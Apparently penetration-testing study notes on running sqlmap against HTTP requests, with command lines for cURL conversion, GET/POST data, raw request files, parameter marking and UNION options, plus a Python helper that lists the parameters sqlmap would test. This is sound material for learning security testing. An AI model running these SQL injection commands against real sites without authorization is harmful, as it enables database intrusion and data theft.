
SQLMap on HTTP Request

  • the sqlmap command has to reproduce the real request (method, headers, parameters) so that the injectable parameter is actually reached

cURL commands

  • use the Copy as cURL feature from the Network (Monitor) panel inside the Chrome, Edge, or Firefox Developer Tools
  • paste it into the command line and swap curl for sqlmap
  • sqlmap 'http://www.example.com/?id=1' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0' -H 'Accept: image/webp,*/*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Connection: keep-alive' -H 'DNT: 1'
  • when providing data to sqlmap:
    • the command must contain an injection parameter, passed via GET or POST
    • or one of the automatic parameter-finding switches (--crawl, --forms, -g)

GET/POST Requests

  • GET requests are passed with -u 'URL.com?id=1'
  • POST requests are passed with --data:
    • sqlmap 'http://URL.com' --data 'uid=1&name=test'
  • for POST, both the uid and name parameters will be tested.
  • if we already know that uid is the injectable parameter:
    • we can restrict testing to it with -p uid
    • or mark its value with an asterisk: --data 'uid=1*&name=test'

Full HTTP Request

  • save the full raw HTTP request (request line, headers and body) to a file (req.txt)
  • sqlmap -r req.txt
  • to focus on one parameter, mark its value with * inside the file, just like above.
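As an added example (not from the original notes), a small parser for the raw request file used with -r that reports which GET/POST parameters sqlmap would consider: all of them by default, or only the ones whose value carries the * marker. The sample request below is constructed and the form-encoded body is an assumption.

```python
import urllib.parse

# Constructed sample request in the raw format sqlmap -r reads (not from the page).
SAMPLE_REQ = (
    "POST /login HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: session=abc123\r\n"
    "\r\n"
    "uid=1*&name=test"
)


def parse_request(raw):
    """Split a raw HTTP request into (method, target, headers, body)."""
    raw = raw.replace("\r\n", "\n")          # tolerate CRLF or LF line endings
    head, _, body = raw.partition("\n\n")    # blank line separates headers from body
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def candidate_parameters(raw):
    """Return the (place, name, value) parameters that would be tested.

    Mirrors the rule in the notes: every GET/POST parameter is tested
    unless one or more values end in '*', in which case only those are.
    Assumes a form-encoded body; JSON/XML bodies are not handled here.
    """
    method, target, headers, body = parse_request(raw)
    params = []
    _path, _, query = target.partition("?")
    for key, value in urllib.parse.parse_qsl(query, keep_blank_values=True):
        params.append(("GET", key, value))
    for key, value in urllib.parse.parse_qsl(body, keep_blank_values=True):
        params.append(("POST", key, value))
    marked = [p for p in params if p[2].endswith("*")]
    if marked:
        # strip the marker so the reported value is the real one
        return [(place, key, value[:-1]) for place, key, value in marked]
    return params


if __name__ == "__main__":
    print(candidate_parameters(SAMPLE_REQ))   # [('POST', 'uid', '1')]
```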

UNION

  • --union-cols=17
    • when we already know the number of columns in the query
  • --union-char='a'
    • when we don't want the filler values to be NULL
  • --union-from=users
    • when the UNION SELECT needs a FROM clause naming a table (here users)